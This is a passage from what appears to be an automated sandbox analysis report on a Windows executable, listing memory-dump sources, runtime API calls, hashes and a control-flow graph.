                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                  • Instruction ID: e005b9805fc87ec86fd2092fc43cee55ef3e6e0f752feecedb6fa5bcf92668ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                  • Instruction Fuzzy Hash: 56C1C122A0C787A2EB719B3994502BE3792FF91B80F5541B1EA5D83799DE7CE856C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF690013534), ref: 00007FF690013411
                                                                                                                                                                    • Part of subcall function 00007FF6900129E0: GetLastError.KERNEL32(?,?,?,00007FF69001342E,?,00007FF690013534), ref: 00007FF690012A14
                                                                                                                                                                    • Part of subcall function 00007FF6900129E0: FormatMessageW.KERNEL32(?,?,?,00007FF69001342E), ref: 00007FF690012A7D
                                                                                                                                                                    • Part of subcall function 00007FF6900129E0: MessageBoxW.USER32 ref: 00007FF690012ACF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                  • API String ID: 517058245-2863816727
                                                                                                                                                                  • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                  • Instruction ID: f7e988efd3d34d4d1c3567dfdcaba566f27d1ad52ae0487ec60254b3518fd80e
                                                                                                                                                                  • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                  • Instruction Fuzzy Hash: DE218121B0C542B1FAB19B34E8417BA2251FF49388F8001B2D69DC77DEEF2CE5048700

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1022 7ff69002ec9c-7ff69002ecd8 1023 7ff69002ee8e-7ff69002ee99 call 7ff6900243f4 1022->1023 1024 7ff69002ecde-7ff69002ece7 1022->1024 1030 7ff69002ee9d-7ff69002eeb9 call 7ff69001b870 1023->1030 1024->1023 1025 7ff69002eced-7ff69002ecf6 1024->1025 1025->1023 1027 7ff69002ecfc-7ff69002ecff 1025->1027 1027->1023 1029 7ff69002ed05-7ff69002ed16 1027->1029 1031 7ff69002ed18-7ff69002ed21 call 7ff69002ec40 1029->1031 1032 7ff69002ed40-7ff69002ed44 1029->1032 1031->1023 1039 7ff69002ed27-7ff69002ed2a 1031->1039 1032->1023 1036 7ff69002ed4a-7ff69002ed4e 1032->1036 1036->1023 1038 7ff69002ed54-7ff69002ed58 1036->1038 1038->1023 1040 7ff69002ed5e-7ff69002ed6e call 7ff69002ec40 1038->1040 1039->1023 1041 7ff69002ed30-7ff69002ed33 1039->1041 1045 7ff69002ed77 call 7ff6900354a4 1040->1045 1046 7ff69002ed70-7ff69002ed73 1040->1046 1041->1023 1044 7ff69002ed39 1041->1044 1044->1032 1049 7ff69002ed7c-7ff69002ed93 call 7ff6900348a8 1045->1049 1046->1045 1047 7ff69002ed75 1046->1047 1047->1045 1052 7ff69002ed99-7ff69002eda4 call 7ff6900348d8 1049->1052 1053 7ff69002eeba-7ff69002eecf call 7ff690029c10 1049->1053 1052->1053 1058 7ff69002edaa-7ff69002edb5 call 7ff690034908 1052->1058 1058->1053 1061 7ff69002edbb-7ff69002ee4f 1058->1061 1062 7ff69002ee89-7ff69002ee8c 1061->1062 1063 7ff69002ee51-7ff69002ee6d 1061->1063 1062->1030 1064 7ff69002ee6f-7ff69002ee73 1063->1064 1065 7ff69002ee84-7ff69002ee87 1063->1065 1064->1065 1066 7ff69002ee75-7ff69002ee80 call 7ff6900354e8 1064->1066 1065->1030 1066->1065
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                  • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                  • Instruction ID: 2e7cce899ec9c28307700aad553fb8b2b20012a66b2451346123962cc9cc4e1b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                                                                                  • Instruction Fuzzy Hash: 4851F372F04251AAEF38DF7899456BC2BA1EB14358F110179DE1E92BE9DF38E4038700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$__security_init_cookie
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2222513578-0
                                                                                                                                                                  • Opcode ID: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
                                                                                                                                                                  • Instruction ID: c2ca61d711092ae3e39f99b9fd34e8f8a558f289c1622a4ab68342770e3c2706
                                                                                                                                                                  • Opcode Fuzzy Hash: 51a1c68c6362424b61c1acff22cfa8e2821de0ade73df4afb968f174aaff75c0
                                                                                                                                                                  • Instruction Fuzzy Hash: 12515D20E0C64342FA9977EDD95517A51919F4DBE0F1C4638DB2E06AD7EF2DB8838708
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                  • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                  • Instruction ID: fb750d108c2623292a4c426ac6b03a416b45b62ce3830a6e35d10ef0c1786b25
                                                                                                                                                                  • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C517822E086419AFB64CF79D4503BD27A5EF48B98F218575DE0D8BB8DDF38D4828740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                  • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                  • Instruction ID: 5952a005980c72c4a21ec1451ba1c3bac91e2bfcf69d06d4c8f20f9078bd3e6a
                                                                                                                                                                  • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                  • Instruction Fuzzy Hash: F6418E22E1878293E7648B7495103696260FFA47A4F109375EB9C83BDDEF7CE5E28700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                  • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                  • Instruction ID: afe7b2b988735ebbddd38d3ccec8b90aff9a20e253ad8cfb1447db602f92aaf3
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C315E25E0D643A2FAB5A7789492BB91381EF4938CF4440B8EA0DC73DFDE2CE8458205
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                  • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                  • Instruction ID: d569a1b56b959919e4391b4fe92eda8a593df69a1d37d3985b962fd582458feb
                                                                                                                                                                  • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17D05E18F19606A3FB382B705C5A5790352DF9C704F0018B8E94F863DBCD2CE80E4300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  • Opcode ID: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
                                                                                                                                                                  • Instruction ID: dccc5a93fb1edc8eaea0c3a3a5aa49b2732faf5f99b8b8419e6084982f1ec758
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b4fdf962c8d231f1478f013950a70e71442974e5fb203732b388d25e7008839
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A215020F0D64382FA59B77D99511BA51515F4CFE0F1C0634E72E066EAEF2EB8435318
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                  • Instruction ID: af25e8a45fb27d1b27e653e50c6fae9c672740ecd08210c6cc40224cfedb9dac
                                                                                                                                                                  • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                                                                                                                                  • Instruction Fuzzy Hash: A7517461B0968266E7B89E3A940067A6691FF84BBCF144774DE6D877DDCF3CF4418600
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                  • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                  • Instruction ID: eac446635ce7575b9d37d0f62653966e237ec8f5716fa4cd681da9f2521c5fe8
                                                                                                                                                                  • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6111C161A08A8191DA209B39A844169A362FB44BF4F540371EEBD877EECF3CD1518700
                                                                                                                                                                  APIs
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF690024B49), ref: 00007FF690024C67
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF690024B49), ref: 00007FF690024C7D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                                                  • Opcode ID: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                  • Instruction ID: 13ba63943fcf9e17d1b92c61686373566194ba48e69e3395ed4554d966dabd6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5814b874014510fcf00941fef2b2171ed045486f006683dc2ae422325307d6da
                                                                                                                                                                  • Instruction Fuzzy Hash: CA11913160C65291EBB48B29A44103EB7A1FF85765F600276FAADC1BDCEF2CD055DB00
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029ED6
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029EE0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                  • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                  • Instruction ID: 3030356d8aea27503f28b97687b9d8cdd9900df51c58f47a08bc158583813bd2
                                                                                                                                                                  • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                  • Instruction Fuzzy Hash: F1218421F1C64261EEB49779A95037D12D2EF847A4F0552B5DA2EC77DACE6CE482C301
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270007702.00007FF8B8301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2269966833.00007FF8B8300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270202656.00007FF8B83EF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270256702.00007FF8B83F2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8b8300000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                  • Instruction ID: efeb553a2444813e880bdb101838b2b1a0573efb175e40619d1ddb9187c13cbc
                                                                                                                                                                  • Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                  • Instruction Fuzzy Hash: D1118C20A1974685FA549BAD98603B9A390AF8CFD0F0C5234DB1E8B3D5DF2DF4528748
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                  • Instruction ID: 7eb7d49f67f8f43a6f4a43045c99bf4c855238541891f3583fbc4642f29adac5
                                                                                                                                                                  • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                  • Instruction Fuzzy Hash: 4641BC32918242A7EA34DA3DA55127D73A2FB96B80F140171DA8EC3798CF3CE503C751
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
